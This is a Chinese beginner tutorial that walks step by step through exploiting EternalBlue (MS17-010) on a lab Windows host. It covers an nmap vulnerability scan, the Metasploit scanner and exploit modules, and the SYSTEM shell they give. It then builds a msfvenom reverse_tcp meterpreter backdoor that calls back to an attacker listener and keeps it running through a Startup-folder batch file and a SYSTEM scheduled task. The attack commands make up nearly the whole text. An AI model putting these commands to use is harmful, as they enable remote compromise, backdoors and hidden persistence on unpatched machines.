新手入门永恒之蓝从扫描->持久化

第一阶段信息收集

本片文章主要以新手入门为主,里面也涉及一些我自己刚学的东西(持久化那里)

通过nmap来搜索存在ms17-010漏洞的主机

nmap --script=vuln -T5 192.168.60.0/24

--script=vuln 使用nmap中的漏洞脚本进行扫描

-T5 使用狂暴模式进行扫描 速度快准确度差一些

发现192.168.60.160主机,存在SMBv1漏洞。

该漏洞是由美国国家安全局(NSA)下属的方程式小组(APT组织)挖掘出来的关于smb服务的远程溢出漏洞。该漏洞强悍点在于可以远程执行命令,并且直接将攻击者提升为system权限

目前该漏洞的POC已经被MSF收录,可以直接使用

第二阶段-漏洞攻击

开启MSF

msfconsole

搜索漏洞攻击模块

msf6 > search ms17-010

获取多个攻击模块,这里首先使用auxiliary/scanner/smb/smb_ms17_010模块进行扫描

该模块作用是扫描目标主机是否存在ms17-010漏洞。这里要注意msf收录的17-010攻击大多数基于x64系统,如果要对x32系统攻击,需要另行下载攻击模块

切换模块

使用use 切换

use auxiliary/scanner/smb/smb_ms17_010

使用 show options来查看需要设置的参数

这里只需要设置RHOST 也就是目标主机参数即可

将参数设置为192.168.60.160

set RHOST 192.168.60.160

然后输入run 开始扫描

run

根据返回结果来看,目标确实存在永恒之蓝漏洞。接下来就是对该漏洞的攻击

切换为漏洞利用模块

use exploit/windows/smb/ms17_010_eternalblue

使用show options查看需要设置的参数

只需要设置rhost即可

设置好后直接run

漏洞利用时候可能出现网络问题导致利用失败,所以可以多次尝试

漏洞利用成功

meterpreter > getuid Server username: NT AUTHORITY\SYSTEM

是system权限,也就是windows最高权限

第三阶段-后门持久化

生成后门

 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.60.151 LPORT=5555 -f exe > windows32.exe

生成一个对应64位系统的后门木马,回连本地5555端口

上传后门

将刚刚生成的后门通过upload 命令上传到我们的目标机器上

upload 需要上传的文件 上传的位置

./ 默认上传到当前目录

对后门进行持久化

持久化方法1 自启动

C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

该目录是自启动目录,在该目录中任何文件都会在开机时候自启动

我们可以创建一个bat文件,然后将它放置在该目录下

@echo off
start "" "C:\Windows\System32\windows32.exe"

然后来到该目录并上传

然后可以进行测试,查看脚本是否好使

后门监控模块

开启一个新的终端

msf6 > use exploit/multi/handler 

需要设置的参数 payload LPORT LHOST

LHOST 写入木马生成时候的LHOST

LPORT 写入木马设置时候的LPORT

pyaload 写入木马生成时设置 -p 后面的内容

msf6 exploit(multi/handler) > set lhost 192.168.60.151
lhost => 192.168.60.151
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

然后run 开始监听

然后我们通过进入shell来运行该文件

meterpreter > shell

可以看到,当这边执行bat脚本的时候,另一个终端收到了shell命令。

持久化放法2 计划任务

由于我们自启动的持久化后门在重启运行时候的权限是普通用户权限,就要导致我们后面还要再继续提权,孩子们这很费劲!

我们需要一种一劳永逸的办法,让我们后门在运行的时候就是system权限!

这需要我们用到计划任务这个东西

首先在用永恒之蓝攻入进去后我们是system权限,然后输入shell,再输入以下命令

schtasks /create /tn "MyStartupTask" /tr "C:\Windows\System32\windows32.exe" /sc ONSTART /ru "NT AUTHORITY\SYSTEM" /rp "" /f

MyStartupTask 可自定义

C:\Windows\System32\windows32.exe 实际中后门存放的位置

这时候,我们重启的时候后门就会直接以system权限来运行,省着我们去提权了!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值